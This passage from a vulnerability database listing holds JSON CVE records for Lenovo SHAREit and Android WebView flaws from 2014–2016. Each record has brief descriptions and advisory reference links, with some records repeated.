"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1491",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.707Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1490 (GCVE-0-2016-1490)
Vulnerability from nvd – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1490",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1490",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.892Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1489 (GCVE-0-2016-1489)
Vulnerability from nvd – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1489",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1489",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.886Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1939 (GCVE-0-2014-1939)
Vulnerability from nvd – Published: 2014-03-03 02:00 – Updated: 2024-08-06 09:58- n/a
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.988Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-08T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1939",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html",
"refsource": "CONFIRM",
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"refsource": "MLIST",
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1939",
"datePublished": "2014-03-03T02:00:00.000Z",
"dateReserved": "2014-02-10T00:00:00.000Z",
"dateUpdated": "2024-08-06T09:58:15.988Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-4783 (GCVE-0-2016-4783)
Vulnerability from cvelistv5 – Published: 2016-05-23 19:00 – Updated: 2024-08-06 00:39- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:39:26.176Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-05-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"Universal XSS (UXSS).\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4783",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"Universal XSS (UXSS).\""
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4783",
"datePublished": "2016-05-23T19:00:00.000Z",
"dateReserved": "2016-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T00:39:26.176Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-4782 (GCVE-0-2016-4782)
Vulnerability from cvelistv5 – Published: 2016-05-23 19:00 – Updated: 2024-08-06 00:39- n/a
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:39:26.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-05-19T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an \"intent scheme URL attack.\""
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-4782",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Lenovo SHAREit before 3.5.98_ww on Android before 4.2 allows remote attackers to have unspecified impact via a crafted intent: URL, aka an \"intent scheme URL attack.\""
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-4782",
"datePublished": "2016-05-23T19:00:00.000Z",
"dateReserved": "2016-05-11T00:00:00.000Z",
"dateUpdated": "2024-08-06T00:39:26.240Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1490 (GCVE-0-2016-1490)
Vulnerability from cvelistv5 – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1490",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows allows remote attackers to obtain sensitive file names via a crafted file request to /list."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1490",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.892Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1489 (GCVE-0-2016-1489)
Vulnerability from cvelistv5 – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1489",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Lenovo SHAREit before 3.2.0 for Windows and SHAREit before 3.5.48_ww for Android transfer files in cleartext, which allows remote attackers to (1) obtain sensitive information by sniffing the network or (2) conduct man-in-the-middle (MITM) attacks via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
